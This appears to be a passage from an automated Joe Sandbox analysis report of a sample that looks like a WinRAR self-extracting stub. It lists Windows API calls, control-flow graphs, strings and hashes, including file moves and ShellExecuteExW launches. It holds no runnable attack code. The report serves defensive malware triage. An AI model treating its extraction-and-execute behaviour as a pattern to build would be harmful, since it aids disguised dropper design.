                                                              • CloseHandle.KERNEL32(00000000), ref: 0089BCEB
                                                              • _swprintf.LIBCMT ref: 0089BD1E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089BD7D
                                                              • SetDlgItemTextW.USER32(?,00000065,008B35F4), ref: 0089BD94
                                                              • GetDlgItem.USER32(?,00000065), ref: 0089BD9D
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0089BDAC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0089BDBB
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089BE68
                                                              • _wcslen.LIBCMT ref: 0089BEBE
                                                              • _swprintf.LIBCMT ref: 0089BEE8
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0089BF32
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0089BF4C
                                                              • GetDlgItem.USER32(?,00000068), ref: 0089BF55
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0089BF6B
                                                              • GetDlgItem.USER32(?,00000066), ref: 0089BF85
                                                              • SetWindowTextW.USER32(00000000,008CA472), ref: 0089BFA7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0089C007
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089C01A
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0089C0BD
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0089C197
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0089C1D9
                                                                • Part of subcall function 0089C73F: __EH_prolog.LIBCMT ref: 0089C744
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089C1FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                              • API String ID: 3445078344-311033401
                                                              • Opcode ID: ca0ce803f92a9af32d9ead6a166dfae64a8bb02617374e9624908fa6dc0a59ab
                                                              • Instruction ID: e77cf46fdda9ecd0c638c2a61c546f25b723ad3948a16523d04a7e3243977997
                                                              • Opcode Fuzzy Hash: ca0ce803f92a9af32d9ead6a166dfae64a8bb02617374e9624908fa6dc0a59ab
                                                              • Instruction Fuzzy Hash: DD42F170944258BAEF21BBA4AD8AFBE3B7CFB01700F080159F641E61D2DB755E44CB26
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 268 890863-890886 call 89ec50 GetModuleHandleW 271 890888-89089f GetProcAddress 268->271 272 8908e7-890b48 268->272 275 8908b9-8908c9 GetProcAddress 271->275 276 8908a1-8908b7 271->276 273 890b4e-890b59 call 8a75fb 272->273 274 890c14-890c40 GetModuleFileNameW call 88c29a call 890602 272->274 273->274 285 890b5f-890b8d GetModuleFileNameW CreateFileW 273->285 290 890c42-890c4e call 88b146 274->290 279 8908cb-8908e0 275->279 280 8908e5 275->280 276->275 279->280 280->272 288 890c08-890c0f CloseHandle 285->288 289 890b8f-890b9b SetFilePointer 285->289 288->274 289->288 291 890b9d-890bb9 ReadFile 289->291 297 890c7d-890ca4 call 88c310 GetFileAttributesW 290->297 298 890c50-890c5b call 89081b 290->298 291->288 294 890bbb-890be0 291->294 296 890bfd-890c06 call 890371 294->296 296->288 305 890be2-890bfc call 89081b 296->305 308 890cae 297->308 309 890ca6-890caa 297->309 298->297 307 890c5d-890c7b CompareStringW 298->307 305->296 307->297 307->309 311 890cb0-890cb5 308->311 309->290 310 890cac 309->310 310->311 313 890cec-890cee 311->313 314 890cb7 311->314 316 890dfb-890e05 313->316 317 890cf4-890d0b call 88c2e4 call 88b146 313->317 315 890cb9-890ce0 call 88c310 GetFileAttributesW 314->315 322 890cea 315->322 323 890ce2-890ce6 315->323 327 890d0d-890d6e call 89081b * 2 call 88e617 call 884092 call 88e617 call 89a7e4 317->327 328 890d73-890da6 call 884092 AllocConsole 317->328 322->313 323->315 325 890ce8 323->325 325->313 334 890df3-890df5 ExitProcess 327->334 333 890da8-890ded GetCurrentProcessId AttachConsole call 8a3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 0089087C
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0089088E
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008908BF
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00890B69
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00890B83
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00890B93
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,008B3C7C,00000000), ref: 00890BB1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00890C09
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00890C1E
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,008B3C7C,?,00000000,?,00000800), ref: 00890C72
                                                              • GetFileAttributesW.KERNELBASE(?,?,008B3C7C,00000800,?,00000000,?,00000800), ref: 00890C9C
                                                              • GetFileAttributesW.KERNEL32(?,?,008B3D44,00000800), ref: 00890CD8
                                                                • Part of subcall function 0089081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
                                                                • Part of subcall function 0089081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858
                                                              • _swprintf.LIBCMT ref: 00890D4A
                                                              • _swprintf.LIBCMT ref: 00890D96
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • AllocConsole.KERNEL32 ref: 00890D9E
                                                              • GetCurrentProcessId.KERNEL32 ref: 00890DA8
                                                              • AttachConsole.KERNEL32(00000000), ref: 00890DAF
                                                              • _wcslen.LIBCMT ref: 00890DC4
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00890DD5
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00890DDC
                                                              • Sleep.KERNEL32(00002710), ref: 00890DE7
                                                              • FreeConsole.KERNEL32 ref: 00890DED
                                                              • ExitProcess.KERNEL32 ref: 00890DF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                              • API String ID: 1207345701-3298887752
                                                              • Opcode ID: f32a21571c791f9c10849fae342df0559a27052dcaaa8949c7c0bb384d995d78
                                                              • Instruction ID: 43abcc0e90a5a5ec2c779b9d865dabcca2f493307cf0f79b5ad31588c8a9a0e8
                                                              • Opcode Fuzzy Hash: f32a21571c791f9c10849fae342df0559a27052dcaaa8949c7c0bb384d995d78
                                                              • Instruction Fuzzy Hash: 55D17DB1448784AFD721AF948849ADFBBE8FF84308F54091DF285D6351CBB0964DCB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 347 89c73f-89c757 call 89eb78 call 89ec50 352 89d40d-89d418 347->352 353 89c75d-89c787 call 89b314 347->353 353->352 356 89c78d-89c792 353->356 357 89c793-89c7a1 356->357 358 89c7a2-89c7b7 call 89af98 357->358 361 89c7b9 358->361 362 89c7bb-89c7d0 call 891fbb 361->362 365 89c7dd-89c7e0 362->365 366 89c7d2-89c7d6 362->366 368 89d3d9-89d404 call 89b314 365->368 369 89c7e6 365->369 366->362 367 89c7d8 366->367 367->368 368->357 381 89d40a-89d40c 368->381 371 89c7ed-89c7f0 369->371 372 89ca7c-89ca7e 369->372 373 89ca5f-89ca61 369->373 374 89c9be-89c9c0 369->374 371->368 379 89c7f6-89c850 call 89a64d call 88bdf3 call 88a544 call 88a67e call 886edb 371->379 372->368 376 89ca84-89ca8b 372->376 373->368 375 89ca67-89ca77 SetWindowTextW 373->375 374->368 378 89c9c6-89c9d2 374->378 375->368 376->368 380 89ca91-89caaa 376->380 382 89c9d4-89c9e5 call 8a7686 378->382 383 89c9e6-89c9eb 378->383 435 89c98f-89c9a4 call 88a5d1 379->435 385 89caac 380->385 386 89cab2-89cac0 call 8a3e13 380->386 381->352 382->383 389 89c9ed-89c9f3 383->389 390 89c9f5-89ca00 call 89b48e 383->390 385->386 386->368 403 89cac6-89cacf 386->403 394 89ca05-89ca07 389->394 390->394 397 89ca09-89ca10 call 8a3e13 394->397 398 89ca12-89ca32 call 8a3e13 call 8a3e3e 394->398 397->398 423 89ca4b-89ca4d 398->423 424 89ca34-89ca3b 398->424 407 89caf8-89cafb 403->407 408 89cad1-89cad5 403->408 411 89cb01-89cb04 407->411 412 89cbe0-89cbee call 890602 407->412 408->411 414 89cad7-89cadf 408->414 416 89cb11-89cb2c 411->416 417 89cb06-89cb0b 411->417 427 89cbf0-89cc04 call 8a279b 412->427 414->368 420 89cae5-89caf3 call 890602 414->420 436 89cb2e-89cb68 416->436 437 89cb76-89cb7d 416->437 417->412 417->416 420->427 423->368 426 89ca53-89ca5a call 8a3e2e 423->426 431 89ca3d-89ca3f 424->431 432 89ca42-89ca4a call 8a7686 424->432 426->368 446 89cc11-89cc62 call 890602 call 89b1be GetDlgItem SetWindowTextW SendMessageW call 8a3e49 427->446 447 89cc06-89cc0a 427->447 431->432 432->423 453 89c9aa-89c9b9 call 88a55a 435->453 454 89c855-89c869 SetFileAttributesW 435->454 470 89cb6a 436->470 471 89cb6c-89cb6e 436->471 439 89cbab-89cbce call 8a3e13 * 2 437->439 440 89cb7f-89cb97 call 8a3e13 437->440 439->427 475 89cbd0-89cbde call 8905da 439->475 440->439 457 89cb99-89cba6 call 8905da 440->457 481 89cc67-89cc6b 446->481 447->446 452 89cc0c-89cc0e 447->452 452->446 453->368 459 89c90f-89c91f GetFileAttributesW 454->459 460 89c86f-89c8a2 call 88b991 call 88b690 call 8a3e13 454->460 457->439 459->435 468 89c921-89c930 DeleteFileW 459->468 491 89c8b5-89c8c3 call 88bdb4 460->491 492 89c8a4-89c8b3 call 8a3e13 460->492 468->435 474 89c932-89c935 468->474 470->471 471->437 478 89c939-89c965 call 884092 GetFileAttributesW 474->478 475->427 488 89c937-89c938 478->488 489 89c967-89c97d MoveFileW 478->489 481->368 485 89cc71-89cc85 SendMessageW 481->485 485->368 488->478 489->435 490 89c97f-89c989 MoveFileExW 489->490 490->435 491->453 497 89c8c9-89c908 call 8a3e13 call 89fff0 491->497 492->491 492->497 497->459
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0089C744
                                                                • Part of subcall function 0089B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0089B3FB
                                                              • _wcslen.LIBCMT ref: 0089CA0A
                                                              • _wcslen.LIBCMT ref: 0089CA13
                                                              • SetWindowTextW.USER32(?,?), ref: 0089CA71
                                                              • _wcslen.LIBCMT ref: 0089CAB3
                                                              • _wcsrchr.LIBVCRUNTIME ref: 0089CBFB
                                                              • GetDlgItem.USER32(?,00000066), ref: 0089CC36
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0089CC46
                                                              • SendMessageW.USER32(00000000,00000143,00000000,008CA472), ref: 0089CC54
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0089CC7F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                              • API String ID: 2804936435-312220925
                                                              • Opcode ID: 1ba9d8eb09eb08db16d25ab83bba740955aceb3bae4b555affe132c3f286afb1
                                                              • Instruction ID: 44f7172fe89a642ddcba0740c0acbf24fd13b6e9cdde8e3dc3890e77c25cf4e3
                                                              • Opcode Fuzzy Hash: 1ba9d8eb09eb08db16d25ab83bba740955aceb3bae4b555affe132c3f286afb1
                                                              • Instruction Fuzzy Hash: 7BE151B2900218AADF25EBA4DD85EEE77BCFB05310F4441A6F609E7141EB749F848B61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0088DA70
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0088DAAC
                                                                • Part of subcall function 0088C29A: _wcslen.LIBCMT ref: 0088C2A2
                                                                • Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0
                                                                • Part of subcall function 00891B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0088BAE9,00000000,?,?,?,0001042C), ref: 00891BA0
                                                              • _wcslen.LIBCMT ref: 0088DDE9
                                                              • __fprintf_l.LIBCMT ref: 0088DF1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                              • API String ID: 566448164-801612888
                                                              • Opcode ID: 3c643bb06e209d48a945d5614e4a986e0ca4b6e425b2478c3be7c3ec6d278b17
                                                              • Instruction ID: f9554537217c20934b71a38231cf99721500bdfef9a77883f20eb403fa622fb8
                                                              • Opcode Fuzzy Hash: 3c643bb06e209d48a945d5614e4a986e0ca4b6e425b2478c3be7c3ec6d278b17
                                                              • Instruction Fuzzy Hash: 7C32ED71900218EBDF24FF68C845AEE77A9FF15304F44056AF906EB281EBB1AD84CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0089B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
                                                                • Part of subcall function 0089B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
                                                                • Part of subcall function 0089B568: IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
                                                                • Part of subcall function 0089B568: TranslateMessage.USER32(?), ref: 0089B5AC
                                                                • Part of subcall function 0089B568: DispatchMessageW.USER32(?), ref: 0089B5B6
                                                              • GetDlgItem.USER32(00000068,008DFCB8), ref: 0089D4E8
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,0089AF07,00000001,?,?,0089B7B9,008B506C,008DFCB8,008DFCB8,00001000,00000000,00000000), ref: 0089D510
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0089D51B
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,008B35F4), ref: 0089D529
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D53F
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0089D559
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D59D
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0089D5AB
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D5BA
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D5E1
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,008B43F4), ref: 0089D5F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: 7fa372499b275f112bdaf6d63348f8c0a4e6235f02f6bfce28d8a4fca174a29e
                                                              • Instruction ID: 51e80281ade20679186bd4edb9d205ebdbe0f7660ba587846006fd8630703bbf
                                                              • Opcode Fuzzy Hash: 7fa372499b275f112bdaf6d63348f8c0a4e6235f02f6bfce28d8a4fca174a29e
                                                              • Instruction Fuzzy Hash: 0431AF71149782ABE301EF249C8EFAB7FACFB86704F040518F551DB2A1DB759A04877A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 837 89d78f-89d7a7 call 89ec50 840 89d9e8-89d9f0 837->840 841 89d7ad-89d7b9 call 8a3e13 837->841 841->840 844 89d7bf-89d7e7 call 89fff0 841->844 847 89d7e9 844->847 848 89d7f1-89d7ff 844->848 847->848 849 89d801-89d804 848->849 850 89d812-89d818 848->850 852 89d808-89d80e 849->852 851 89d85b-89d85e 850->851 851->852 853 89d860-89d866 851->853 854 89d810 852->854 855 89d837-89d844 852->855 859 89d868-89d86b 853->859 860 89d86d-89d86f 853->860 856 89d822-89d82c 854->856 857 89d84a-89d84e 855->857 858 89d9c0-89d9c2 855->858 861 89d81a-89d820 856->861 862 89d82e 856->862 863 89d854-89d859 857->863 864 89d9c6 857->864 858->864 859->860 865 89d882-89d898 call 88b92d 859->865 860->865 866 89d871-89d878 860->866 861->856 867 89d830-89d833 861->867 862->855 863->851 871 89d9cf 864->871 872 89d89a-89d8a7 call 891fbb 865->872 873 89d8b1-89d8bc call 88a231 865->873 866->865 868 89d87a 866->868 867->855 868->865 874 89d9d6-89d9d8 871->874 872->873 882 89d8a9 872->882 883 89d8d9-89d8e6 ShellExecuteExW 873->883 884 89d8be-89d8d5 call 88b6c4 873->884 877 89d9da-89d9dc 874->877 878 89d9e7 874->878 877->878 881 89d9de-89d9e1 ShowWindow 877->881 878->840 881->878 882->873 883->878 886 89d8ec-89d8f9 883->886 884->883 888 89d8fb-89d902 886->888 889 89d90c-89d90e 886->889 888->889 892 89d904-89d90a 888->892 890 89d910-89d919 889->890 891 89d925-89d944 call 89dc3b 889->891 890->891 899 89d91b-89d923 ShowWindow 890->899 893 89d97b-89d987 CloseHandle 891->893 906 89d946-89d94e 891->906 892->889 892->893 896 89d989-89d996 call 891fbb 893->896 897 89d998-89d9a6 893->897 896->871 896->897 897->874 900 89d9a8-89d9aa 897->900 899->891 900->874 903 89d9ac-89d9b2 900->903 903->874 905 89d9b4-89d9be 903->905 905->874 906->893 907 89d950-89d961 GetExitCodeProcess 906->907 907->893 908 89d963-89d96d 907->908 909 89d96f 908->909 910 89d974 908->910 909->910 910->893
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0089D7AE
                                                              • ShellExecuteExW.SHELL32(?), ref: 0089D8DE
                                                              • ShowWindow.USER32(?,00000000), ref: 0089D91D
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0089D959
                                                              • CloseHandle.KERNEL32(?), ref: 0089D97F
                                                              • ShowWindow.USER32(?,00000001), ref: 0089D9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                              • String ID: .exe$.inf
                                                              • API String ID: 36480843-3750412487
                                                              • Opcode ID: 6e42f3466be23ee0891d49a44d79ee2b702e9fb74b88997102a349f0da6a8ffd
                                                              • Instruction ID: 30dd999fced553497647bd4819765de03a295584cb31deb68078db43a410ba05
                                                              • Opcode Fuzzy Hash: 6e42f3466be23ee0891d49a44d79ee2b702e9fb74b88997102a349f0da6a8ffd
                                                              • Instruction Fuzzy Hash: C451B2715083849ADF31BB249844BABBBE4FF85744F0C082EF9C5E7292E7718945CB5A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 911 8aa95b-8aa974 912 8aa98a-8aa98f 911->912 913 8aa976-8aa986 call 8aef4c 911->913 914 8aa99c-8aa9c0 MultiByteToWideChar 912->914 915 8aa991-8aa999 912->915 913->912 923 8aa988 913->923 917 8aab53-8aab66 call 89fbbc 914->917 918 8aa9c6-8aa9d2 914->918 915->914 920 8aaa26 918->920 921 8aa9d4-8aa9e5 918->921 927 8aaa28-8aaa2a 920->927 924 8aa9e7-8aa9f6 call 8b2010 921->924 925 8aaa04-8aaa15 call 8a8e06 921->925 923->912 928 8aab48 924->928 938 8aa9fc-8aaa02 924->938 925->928 939 8aaa1b 925->939 927->928 929 8aaa30-8aaa43 MultiByteToWideChar 927->929 933 8aab4a-8aab51 call 8aabc3 928->933 929->928 932 8aaa49-8aaa5b call 8aaf6c 929->932 940 8aaa60-8aaa64 932->940 933->917 942 8aaa21-8aaa24 938->942 939->942 940->928 943 8aaa6a-8aaa71 940->943 942->927 944 8aaaab-8aaab7 943->944 945 8aaa73-8aaa78 943->945 947 8aaab9-8aaaca 944->947 948 8aab03 944->948 945->933 946 8aaa7e-8aaa80 945->946 946->928 949 8aaa86-8aaaa0 call 8aaf6c 946->949 951 8aaacc-8aaadb call 8b2010 947->951 952 8aaae5-8aaaf6 call 8a8e06 947->952 950 8aab05-8aab07 948->950 949->933 966 8aaaa6 949->966 955 8aab09-8aab22 call 8aaf6c 950->955 956 8aab41-8aab47 call 8aabc3 950->956 951->956 964 8aaadd-8aaae3 951->964 952->956 965 8aaaf8 952->965 955->956 969 8aab24-8aab2b 955->969 956->928 968 8aaafe-8aab01 964->968 965->968 966->928 968->950 970 8aab2d-8aab2e 969->970 971 8aab67-8aab6d 969->971 972 8aab2f-8aab3f WideCharToMultiByte 970->972 971->972 972->956 973 8aab6f-8aab76 call 8aabc3 972->973 973->933
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008A5695,008A5695,?,?,?,008AABAC,00000001,00000001,2DE85006), ref: 008AA9B5
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008AABAC,00000001,00000001,2DE85006,?,?,?), ref: 008AAA3B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008AAB35
                                                              • __freea.LIBCMT ref: 008AAB42
                                                                • Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              • __freea.LIBCMT ref: 008AAB4B
                                                              • __freea.LIBCMT ref: 008AAB70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 19dc83eb77cf9beffcd51bfbb4ed011f9f8d4ce7fa1ef560c6f5e72a66dbabc7
